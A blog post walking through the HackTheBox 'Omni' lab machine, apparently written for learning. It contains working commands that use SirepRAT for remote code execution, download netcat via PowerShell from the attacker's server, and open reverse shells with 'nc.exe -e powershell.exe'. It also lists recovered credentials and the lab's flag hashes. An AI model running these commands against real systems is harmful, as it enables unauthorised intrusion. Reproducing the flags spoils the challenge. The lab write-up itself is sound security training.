Posts Hackthebox Omni writeup
Post
Cancel

Hackthebox Omni writeup

Introduction@Omni:~$

Column Details
Name Omni
IP 10.10.10.204
Points 20
Os Other
Difficulty Easy
Creator egre55
Out On 22 Aug 2020

Brief@Omni:~$

  • nmapScanning found open ports and services:, 8080(web)and it shows yes Windows Device Portal.
  • Use Windows Iotexploits SirepRATto execute code.
  • Use powershell invoke-webrequestdownload nc64.exe.
  • Rebound the shell, enumerate, find the r.batfile and its credentials.
  • Sign in with credentials 8080service port.
  • Use Windows Device Portalthe function of executing code to rebound the shell again.
  • Enumerate to find the flag file.
  • Use powershelldecryption.
  • rootSame as above.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

Nmap scan report for 10.10.10.204
Host is up (0.30s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Basic realm=Windows Device Portal
| http-server-header: Microsoft-HTTPAPI/2.0
| http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
                                                                
  • From the Nmap results, we can say that our machine is a Windows-based one. Let’s discuss the services in each port.
  • Port 135 – Windows RPC – Client/Server Application. It is mostly opened in the Windows server for a Client/Server model.
  • Port 5985 – Windows – Remote Management (WinRM).
  • Port 8080 – Seems to be a Web-Server with Realm “Windows Device Portal”.
  • Ports 29817,29820 – Unknown Ports. This means that Nmap can’t find the possible services from IANA Port Numbers Registry.
  • Port 29819 – Arcserve Discovery. It’s a Backup Configuration protocol used by DS (Discovery Server) in Windows.
  • Port 29819

    
        root@DEDSEC:~# nc 10.10.10.204 29819
        PING
                                                            
  • PING? This is something similar to ‘echo’ service running on Port 7 TCP/UDP. So, leaving it now. Port 29817 didn’t respond back.
  • Port 20820

    
        root@DEDSEC:~# nc 10.10.10.204 20820
        *LY??`G?m?}?0
                                                            
  • This port was thrown me nothing but a non-readable string. Seems like Rabbit hole. Without wasting time, I hit the firefox for Port 8080.
  • Web Enumeration

  • As all the ports are confusing, I tried NC against port 8080.


  • The common credentials aren’t worked out. So I hit the Forum discussion to check if there are any hints available or not.
  • People were talking about a script where they found it as a hook for the machine.

  • SirepRAT RCE – Windows IOT Core – Initial Shell



  • Okay. There is a script that people are talking about. It is used to abuse the Sirep Test Service which is usually running on the Windows IoT device cause an RCE on the device.
  • Reference : SirepRAT
  • And Also Download Windows Netcat Binary (64 bit) from : Here
  • Extract netcat Binary And Go In The directory And and start SimpleHTTPServer.
  • 
        root@DEDSEC:~# python -m SimpleHTTPServer
        Serving HTTP on 0.0.0.0 port 8000 ...
                                                            
  • Now lets run SirepRAT. Get inside SirepRAT directory and run

  • 
        root@DEDSEC:~# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.208:8000/nc64.exe" --v
                                                            
  • The Command was Executed successfully.
  • Lets look at SimpleHTTPServer, and it looks like the box made a Web-Request and we have uploaded our file successfully

  • 
        root@DEDSEC:~# python -m SimpleHTTPServer
        Serving HTTP on 0.0.0.0 port 8000 ...
        10.10.10.204 - - [23/Aug/2020 23:37:49] "GET /nc64.exe HTTP/1.1" 200 -
                                                            
  • Now get your Netcat listener ready.
  • 
        root@DEDSEC:~# nc -nvlp 4444
        listening on [any] 4444 ....
                                                            
  • Now let's execute Netcat on the box. With Help Of SirepRAT
  • 
        root@DEDSEC:~# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.... 4444 -e powershell.exe" --v
                                                            
  • We got our first shell in the machine.

  • 
        root@DEDSEC:~# nc -nvlp 4444
        listening on [any] 1234 ....
        connect to [10.10....] from omni.htb [10.10.10.204] 49686
        Windows PowerShell
        Copyright (C) Microsoft Corporation. All rights reserved.
        PS C:\windows\system32> 
                                                            
  • We can't use whoami, but we could use $env:UserName to know the Username.
  • 
        root@DEDSEC:~# nc -nvlp 4444
        listening on [any] 1234 ....
        connect to [10.10....] from omni.htb [10.10.10.204] 49686
        Windows PowerShell
        Copyright (C) Microsoft Corporation. All rights reserved.
        PS C:\windows\system32> $env:UserName
        $env:UserName
        omni$
        PS C:\windows\system32>
                                                            
  • We are User Omni and it has no rights to read in user.txt neither root.txt. Thus we need to enumerate further.
  • After further Enumeration we got in a directory.
  • "c:\Program Files\WindowsPowershell\Modules\PackageManagement"

  • We Got Two Creads
  • Username app
  • Password: mesh5143
  • Username administrator
  • Password: _1nt3rn37ofTh1nGz

  • Remember the Webserver running on Port 8080. We could use our credentials there.
  • Lets jump into Firefox. Login via app:mesh5143
  • The credential app:mesh5143 worked and we have the ability to run the command with user “app” privileges. Let’s gain a reverse shell
  • 
        $ C:\Windows\System32\spool\drivers\color\nc.exe 10.10...... 1235 -e powershell.exe
                                                            

    Lets start a ncat lisner


    
        root@DEDSEC:~# nc -nvlp 1235
        listening on [any] 1234 ....
                                                            

  • The website will show "Failed to run the command" but you'd still get your shell.
  • 
        root@DEDSEC:~# nc -nvlp 1235
        listening on [any] 1235 ....
        connect to [10.10....] from (UNKNOWN) [10.10.10.204] 49700
        Windows PowerShell
        Copyright (C) Microsoft Corporation. All rights reserved.
        PS C:\windows\system32> 
                                                            
  • Again using this $env:UserName To Find Which User Shell We Got
  • 
        root@DEDSEC:~# nc -nvlp 1235
        listening on [any] 1235 ....
        connect to [10.10....] from (UNKNOWN) [10.10.10.204] 49700
        Windows PowerShell
        Copyright (C) Microsoft Corporation. All rights reserved.
        PS C:\windows\system32> $env:UserName
        $env:UserName
        app$
        PS C:\windows\system32>
                                                            
  • we are App
  • We can now read user.txt but the contents inside looks to be encrypted.
  • Now we do the decryption process of PS credential by importing the CliXml module.
  • 
        PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
        $credential = Import-CliXml -Path U:\Users\app\user.txt
        PS C:\windows\system32> $credential.GetNetworkCredential().Password
        $credential.GetNetworkCredential().Password
        7cfd50f6bc34db3204898f1505ad9d70
                                                            

    We got the user flag.

  • Remember we found two usernames in r.bat file? Let's use the second one, the Administrator.
  • Close Firefox and start it again.
  • Login via: administrator
  • Start another Netcat listener.
  • Go to Processes > Run Command
  • Run this Command
  • 
        C:\Windows\System32\spool\drivers\color\nc.exe 10.10..... 1234 -e powershell.exe
                                                            
  • We get a reverse shell.
  • Now lets decrypt the root.txt file
  • 
        root@DEDSEC:~# nc -nvlp 1234
        listening on [any] 1234 ....
        connect to [10.10....] from (UNKNOWN) [10.10.10.204] 49701
        Windows PowerShell
        Copyright (C) Microsoft Corporation. All rights reserved.
        PS C:\windows\system32> $env:UserName
        $env:UserName
        Administrator$
        PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\administrator\root.txt
        $credential = Import-CliXml -Path U:\Users\administrator\root.txt
        PS C:\windows\system32> $credential.GetNetworkCredential().Password
        $credential.GetNetworkCredential().Password
        5dbdce5569e2c4708617c0ce6e9bf11d
        PS C:\windows\system32> 
                                                            

    We got the Root hash.

    And we pwned it …….

    If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

    Resources

    Topic Url
    SirepRAThttps://github.com/SafeBreach-Labs/SirepRAT
    pentest-monkey shellhttp://pentestmonkey.net/tools/web-shells/php-reverse-shell
    Netcat Binaryhttps://eternallybored.org/misc/netcat/
    This post is licensed under CC BY 4.0

    Hackthebox Jewel writeup

    Fortress Reel2 writeup

    © 2020 Dedinfosec . All rights reserved.